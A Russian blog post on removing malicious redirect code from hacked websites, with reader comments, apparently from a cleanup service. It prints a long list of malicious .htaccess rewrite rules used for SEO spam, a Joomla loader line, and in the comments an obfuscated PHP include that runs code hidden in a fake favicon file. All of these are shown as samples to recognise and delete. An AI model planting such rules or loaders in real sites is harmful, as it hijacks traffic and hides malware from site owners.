Никакой владелец сайта не захочет, чтобы траффик с его сайта уходил через редирект к неизвестным сайтам - это неинтересно как клиентам, подрывает доверие покупателей и вызывает санкции поисковых систем и антивирусов. 

Удаление вируса редиректа на сайте
Удаление вируса редиректа на сайте

В данной статье я рассмотрю основные варианты встраивания вирусных редиректов. 

Внимание! Удаляя редирект, Вы удаляете лишь следстствие, для того, чтобы ситуация не повторилась, Вам стоит искать причину попадания вирусов на сайт!

Кроме этого, вредоносные редиректы плохо детектируются сканерами и антивирусами, что зачастую приходится искать вручную источник зла.

В первую очередь ищем вставки кода в файлы .htaccess, особенно в корне сайта

Все что связано с Rewrite стоит проверить, куда перенаправляет.

Ниже я приведу пару вредоносных вставок - которые создают дорвеи и тысячи страниц в поиске, так называемый японский спам (сео-спам, страницы с иероглифами - тут много названий):

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)%(.*)[0-9]+%[0-9]+%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%([^\d\/]+)([^\d\/]+)%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%(.*)F%(.*)[0-9]+%(.*)[0-9]+%([^\d\/]+)([0-9]+)%(.*)[0-9]+%[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)[0-9]+%([^\d\/]+)(.*)%(.*)[0-9]+%(.*)[0-9]+%(.*)(.*)%([^\d\/]+)F%(.*)[0-9]+%[0-9]+%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+([0-9]+)%(.*)[0-9]+%[0-9]+%(.*)(.*)%(.*)[0-9]+%[0-9]+%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)([^\d\/]+)%(.*)[0-9]+%(.*)[0-9]+%(.*)([0-9]+)%(.*)[0-9]+%(.*)(.*)%[0-9]+(.*)%(.*)[0-9]+%[0-9]+F%(.*)F%(.*)[0-9]+%[0-9]+%([^\d\/]+)([0-9]+)%(.*)[0-9]+%[0-9]+%(.*)([^\d\/]+)%[0-9]+\/.*..*$ ?$65$39=$62&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)[0-9]+%[0-9]+%[0-9]+.*-S.*-.*-F.*-([^\d\/]+).*-[0-9]+..*$ ?$7$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)([0-9]+)[0-9]+%[0-9]+([^\d\/]+)[0-9]+%[0-9]+([0-9]+)[0-9]+%[0-9]+([^\d\/]+)[0-9]+%[0-9]+([0-9]+)[0-9]+%[0-9]+([^\d\/]+)[0-9]+%[0-9]+([0-9]+)[0-9]+%[0-9]+([^\d\/]+)([0-9]+)%[0-9]+([0-9]+)[0-9]+%[0-9]+%[0-9]+([0-9]+)[0-9]+%[0-9]+([^\d\/]+)-.*-[0-9]+..*$ ?$15$1=$14&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-[0-9]+.*[0-9]+..*$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*HM[0-9]+L.*[0-9]+.*[0-9]+N.*[0-9]+YW.*[0-9]+.*[0-9]+.*([0-9]+)[0-9]+.*[0-9]+F.*W[0-9]+.*[0-9]+.*F[0-9]+ZW.*HR.*(.*)--$ ?$2$10=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*..*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*([0-9]+).*L[0-9]+N.*YXJ.*HJ.*WF.*[0-9]+.*Y[0-9]+.*(.*).*R.*Y.*V.*[0-9]+Q.*$ ?$2$1=$4&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)\/$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*([0-9]+).*L[0-9]+.*[0-9]+.*[0-9]+YW.*[0-9]+.*[0-9]+.*([0-9]+)[0-9]+-$ ?$2$8=$4&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*%[0-9]+F.*-.*-.*-.*%[0-9]+F&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*HM[0-9]+L.*[0-9]+.*F[0-9]+ZW.*WF.*[0-9]+.*Y[0-9]+.*(.*).*ZG[0-9]+.*ZXN[0-9]+.*WN.*ZH(.*).*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%([^\d\/]+)(.*)%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([^\d\/]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%[0-9]+([^\d\/]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+-%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)F%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+([^\d\/]+)$ ?$36$1=$35&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/[0-9]+%([0-9]+)[0-9]+%[0-9]+.*[0-9]+$ ?$1$3=$4&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*%[0-9]+F.*-.*-.*-.*-.*%[0-9]+F$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*%[0-9]+F.*-[0-9]+-.*-.*-.*-.*-.*%[0-9]+F&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)_[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/.*-.*-[0-9]+-.*\/$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/[0-9]+.*\/$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)[0-9]+%[0-9]+%[0-9]+-.*[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)-.*-V.*%[0-9]+(.*)[0-9]+%[0-9]+%[0-9]+.*-S.*[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/.*-.*-[0-9]+\/$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)-[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)..*&.*=.*\:\/.*-[0-9]+..*\/.*-.*-.*-.*-.*-.*\/&.*=[0-9]+K([^\d\/]+)&.*=%([0-9]+)[0-9]+%(.*)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]++%([0-9]+)[0-9]+%[0-9]++%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]++%([0-9]+)[0-9]+%([^\d\/]+)[0-9]++%([0-9]+)[0-9]+%([^\d\/]+)F%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+&.*=[0-9]+&.*=[0-9]+&.*=[0-9]+&.*=.*\:\/.*[0-9]+..*..*..*\/.*\?.*=OIP.(.*).*U.*[0-9]+.*([0-9]+).*U.*[0-9]+.*[0-9]+V[0-9]+.*Q(.*).*([0-9]+).*&.*=[0-9]+.[0-9]+&.*=[0-9]+&.*=[0-9]+&.*=[0-9]+&.*=[0-9]+&.*=[0-9]+&.*=%([0-9]+)[0-9]+%(.*)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]++%([0-9]+)[0-9]+%[0-9]++%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]++%([0-9]+)[0-9]+%([^\d\/]+)[0-9]++%([0-9]+)[0-9]+%([^\d\/]+)F%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+&.*=[0-9]+.*[0-9]+.*&.*=[0-9]+.*[0-9]+.*&.*=[0-9]+.*[0-9]+.*&.*=[0-9]+.*[0-9]+.*[0-9]+.*&.*=[0-9]+.*[0-9]+.*[0-9]+.*$ ?$148$146=$147&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+([^\d\/]+)&.*=[0-9]+&.*=[0-9]+$ ?$11$1=$10&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%.*%.*[0-9]+%[0-9]+%.*[0-9]+%.*%.*[0-9]+%.*[0-9]+%.*[0-9]+%.*%.*[0-9]+%.*[0-9]+%.*[0-9]+%[0-9]+%.*[0-9]+%.*%.*[0-9]+%[0-9]+.*%.*[0-9]+%.*[0-9]+-%.*[0-9]+%[0-9]+%.*[0-9]+%.*[0-9]+%.*[0-9]+%[0-9]+%.*[0-9]+%.*[0-9]+%.*[0-9]+%.*%.*[0-9]+%[0-9]+%.*[0-9]+%[0-9]+.*\/$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%.*%.*[0-9]+%.*%.*[0-9]+%.*[0-9]+%.*[0-9]+%.*%.*[0-9]+%[0-9]+.*\/$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)\/.*-.*\/[0-9]+\/.*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%([^\d\/]+)(.*)%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([^\d\/]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%[0-9]+([^\d\/]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+-%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)F%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+([^\d\/]+)\/.*\/[0-9]+\/$ ?$36$1=$35&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/[0-9]+%([0-9]+)[0-9]+%[0-9]+.*[0-9]+\/$ ?$1$3=$4&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%([^\d\/]+)F%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)&.*=-[0-9]+&.*=-[0-9]+$ ?$49$38=$50&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/.*-.*-.*-.*\/$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/.*[0-9]+\/$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%([^\d\/]+)F%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]++%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)&.*=-[0-9]+&.*=-[0-9]+$ ?$49$38=$50&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/[0-9]+.*[0-9]+\/$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)..*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/.*\/$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%.*%.*[0-9]+%[0-9]+%.*[0-9]+%.*%.*[0-9]+%.*[0-9]+%.*[0-9]+%.*%.*[0-9]+%.*[0-9]+%.*[0-9]+%[0-9]+%.*[0-9]+%.*%.*[0-9]+%[0-9]+.*%.*[0-9]+%.*[0-9]+-%.*[0-9]+%[0-9]+%.*[0-9]+%.*[0-9]+%.*[0-9]+%[0-9]+%.*[0-9]+%.*[0-9]+%.*[0-9]+%.*%.*[0-9]+%[0-9]+%.*[0-9]+%[0-9]+.*\/.*\/[0-9]+\/$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)&.*=-[0-9]+$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)&.*=[0-9]+$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/[0-9]+%([0-9]+)[0-9]+%[0-9]+.*\/$ ?$1$3=$4&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)[0-9]+%[0-9]+%[0-9]+.*-S.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)..*$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)([^\d\/]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)F%([0-9]+)[0-9]+%[0-9]+([^\d\/]+)\/$ ?$15$1=$14&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%([^\d\/]+)(.*)%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([^\d\/]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%[0-9]+([^\d\/]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+-%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)F%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+([^\d\/]+)\/$ ?$36$1=$35&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-[0-9]+\/$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*\/\?.*=[0-9]+$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*\/$ ?$1$3=$2&%{QUERY_STRING}[L]

Если увидите что-то подобное - смело можно удалять, если сомневаетесь, какие строки можно оставить, то возьмите стандартный файл вашей CMS - там не будет находиться вирус!

Обычно редиректы прописывают для запросов с мобильных и планшетов:

android|plucker|pocket|psp|symbian|treo|vodafone|wap и другие вариации мобильных заголовков

как и для переходов с поисковых систем:

yandex|google|mail|rambler|vk.com

Если этот пункт не помог, то стоит обратить внимание на код страницы - порой часто редирект добавляют через Javascript

Чтобы избавиться от вредоносного кода может понадобиться массовая замена всех .js файлов.

Обязательно проверяйте индексные файлы и папку шаблона - это излюбленные места хакеров для вирусов. Особенно тщательно пройдитесь по файлам index.php, footer.php, head.php, header.php - в последнее время популярно стало размещать сами вирусы не в них, а в виде ссылок. Поэтому внимательно проверяйте, какие файлы подгружаются посредством команд include и require.

Самые изощренные вставки делаются уже в подгружаемые модули, плагины и компоненты. Это могут быть как отдельно внедренные модули (особенно если была взломана админка), так и просто вставки зашифрованного кода в файлы известных и популярных расширений.

К примеру, в последнее время встречаю не один сайт на джумле ( в частности на Joomla 2.5), где по пути includes/inc.class.php находится сам вирус, а в файл application.php в этой же папке вставлена следующая строка

require_once($_SERVER["DOCUMENT_ROOT"]."/includes/inc.class.php");

Обычно параллельно с этим libraries/joomla/appplication находится вирус редиректа с именем joomla-app.php

В любом случае, если заметили на сайте перенаправление на сторонний сайт, то обязательно стоит предпринять меры безопасности и проверять весь сайт. Если сами не можете справитья, то обязательно стоит обратиться к специалистам по удалению вирусов и защите сайтов.

Комментарии   
+2 # Надежда 27.06.2016 04:54
Может лучше программу айболит запустить? Сайт моего клиента именно так вылечил хостер
Ответить | Ответить с цитатой | Цитировать
+3 # Protect Your Site 27.06.2016 06:10
Надо понимать, что такой вариант лечения может в зависимости от настроек ( на хостинге скорее всего будут упрощенные) удалить или не все ирусы, или удалить лишние файлы. Кроме этого, удаление вирусов без устранения уязвимости - это дохлый номер, через пару дней можно будет снова удалять по новой!
Ответить | Ответить с цитатой | Цитировать
0 # Виктор 04.01.2017 10:47
У меня ситуация следующая на сайте клиента появился вирус редирект, сайт на WordPress, появилась куча левых страниц в выдаче, при переходе по которым они редиректят на сайт essayoneday.com , как вылечить помогите пожалуйста...
Ответить | Ответить с цитатой | Цитировать
+1 # Protect Your Site 04.01.2017 11:24
Если не знаете как, то можете заказать услугу чистки сайта и ваш сайт будет быстро защищен.
Ответить | Ответить с цитатой | Цитировать
0 # Влад 14.02.2017 19:39
Именно ТАМ и БЫЛ КОД!!!!!!!!!!! Спасибо!!! Вы супер!!!!
Ответить | Ответить с цитатой | Цитировать
0 # руслан 01.04.2017 12:30
У меня такая фигня произошла с сайтом. Сделал бекап, но даже он не помог решить проблему. В чем дело, не понимаю..
Ответить | Ответить с цитатой | Цитировать
-1 # Protect Your Site 01.04.2017 18:10
Что подробнее и почему бекап должен исправить проблему? Распространенна я ошибка надеяться на резервную копию, надо исправлять корень проблемы - закрывать уязвимость и удалять вирусы, а потом желательно накатить ещё защиту, и тогда хакеры не позарятся на Ваш сайт.
Ответить | Ответить с цитатой | Цитировать
+1 # Коля 18.04.2017 10:20
У меня в папке «aiowps_backups » в файле «.htaccess.back up» странный код:
«@include «\x2fho\x73ti\x 6eg/\x74eh\x6eo h\x65l/\……и т.д.»
как вы думаете. это вирус?
Перенаправление идут на другие сайты и не могу найти где эта зараза сидит. Сайт на WP
Ответить | Ответить с цитатой | Цитировать
+1 # Protect Your Site 18.04.2017 10:26
Очень похоже на то, с учетом, что символом @ подавление ошибок делается, дабы не вызывать подозрений.
В самую первую очередь проверяйте файлы шаблона и wp-blog-header. php
Ответить | Ответить с цитатой | Цитировать
0 # Коля 18.04.2017 11:20
Спасибо за быстрый ваш ответ!
Извиняюсь, а Вы не знаете, как можно раскодировать этот код и посмотреть, что было там прописано? Хочу узнать на какие файлы он ссылается еще
Ответить | Ответить с цитатой | Цитировать
+1 # Protect Your Site 18.04.2017 11:29
Вышлите на почту в архиве файл, здесь посторонний код просто обрежется.
Ответить | Ответить с цитатой | Цитировать
0 # Коля 18.04.2017 12:01
Да, не, вроде как не режиться код:
Код:@include "\x2fho\x73ti\x6eg/\x74eh\x6eoh\x65l/\x64at\x61/w\x77w/\x74eh\x6eoh\x65lp\x2eco\x6d.u\x61/w\x70-i\x6ecl\x75de\x73/R\x65qu\x65st\x73/R\x65sp\x6fns\x65/f\x61vi\x63on\x5f7e\x62f8\x33.i\x63o";
Ответить | Ответить с цитатой | Цитировать
+3 # Protect Your Site 18.04.2017 12:15
/hosting/****** ***/data/www/si te/wp-includes/ Requests/Respon se/favicon_7ebf 83.ico
Ответить | Ответить с цитатой | Цитировать
0 # Коля 18.04.2017 12:20
Спасибо! Если не секрет, как Вы перекодировали?
Ответить | Ответить с цитатой | Цитировать
+2 # Protect Your Site 18.04.2017 12:27
Заменил @include на echo и вызвал скрипт)
Ответить | Ответить с цитатой | Цитировать
+2 # Коля 18.04.2017 12:31
хм, так все просто оказалось ))) А я тут мудрю.
Но мне все равно не понятно, зачем вирусу создавать фавикон и потов размещать на сайте?
Это мой последний вопрос, и так я очень сильно Вам благодарен за потраченное Вами время на меня!
Ответить | Ответить с цитатой | Цитировать
+2 # Protect Your Site 18.04.2017 12:35
Проверьте содержимое файла wp-includes/Req uests/Response/ favicon_7ebf83. ico - многие антивирусы игнорируют изображения для проверки. А через функцию include без разницы в каком расширении подключать файл, если там будет исполняемый код, то он запустится.
Ответить | Ответить с цитатой | Цитировать
0 # Коля 18.04.2017 12:54
Да, вы правы, открыл блокнотом фавикон и там был прописан вирус в закодированном виде "64_decode".
Спасибо! Буду теперь искать каким образом все это туда попало
Еще раз спасибо!
Ответить | Ответить с цитатой | Цитировать
0 # Коля 18.04.2017 11:17
Спасибо!
Вы имеете ввиду проверить тему?
Если проверить файлы темы, то там был один лишний файлик "proxi.php".
Ответить | Ответить с цитатой | Цитировать
+1 # Protect Your Site 18.04.2017 11:23
Проверять надо все файлы на сайте, а если сайтов несколько на аккаунте, то и все сайты.
К файлам темы надо тщательнее отнестись и лучше вручную открыть и просмотреть код, обратить внимание на подключение внешних файлов через include и require
Ответить | Ответить с цитатой | Цитировать
0 # Natalya 23.06.2017 17:06
У меня был такой! Один в один, он и еще и размножался сам. Не знала, как победить его. Вычищала и руками, и муж бекап делал, и к хостеру обращались. Они тоже чистили своими способами. Наконец, ушло. Теперь даже в админку боюсь сама входить - фобия на вирусы появилась :-)
Ответить | Ответить с цитатой | Цитировать
-1 # liza 01.03.2018 14:12
здрасти

не подскажите что это за папка

aiowps_backups

вот полный путь до папки

wp-content/aiowps_backups

там три файла

.htaccess

.htaccess.backup

index.html

в файле .htaccess

order deny,allow
deny from all

в файле .htaccess.backup

# BEGIN WordPress

RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILEN AME} !-f
RewriteCond %{REQUEST_FILEN AME} !-d
RewriteRule . /index.php [L]


# END WordPress


order allow,deny
deny from all



в файле index.html

там пусто никаких записей нет
Ответить | Ответить с цитатой | Цитировать
0 # Protect Your Site 01.03.2018 15:11
Это папка плагина All In One WP Security, там ничего страшного нету!
Ответить | Ответить с цитатой | Цитировать
0 # liza 01.03.2018 15:18
Понятно

Подскажите пожалуйста если можно, что еще можно было бы поставить с связке с

All In One WP Security

какой нибудь сканер, если были изменения в файлах и автоматически сканировал сайт, буквально все что бы можно было бы обезопасить сайт?

Сделать такую связку чтобы они не конфликтовали между собой
Ответить | Ответить с цитатой | Цитировать
0 # Protect Your Site 01.03.2018 16:19
Можно поставить в крон что-то типо https://github.com/lucanos/Tripwire - это контролирует, какие файлы меняются, но изменяемые файлы придется проверять вручную. А так больше бесплатных аналогов нету.
Ответить | Ответить с цитатой | Цитировать
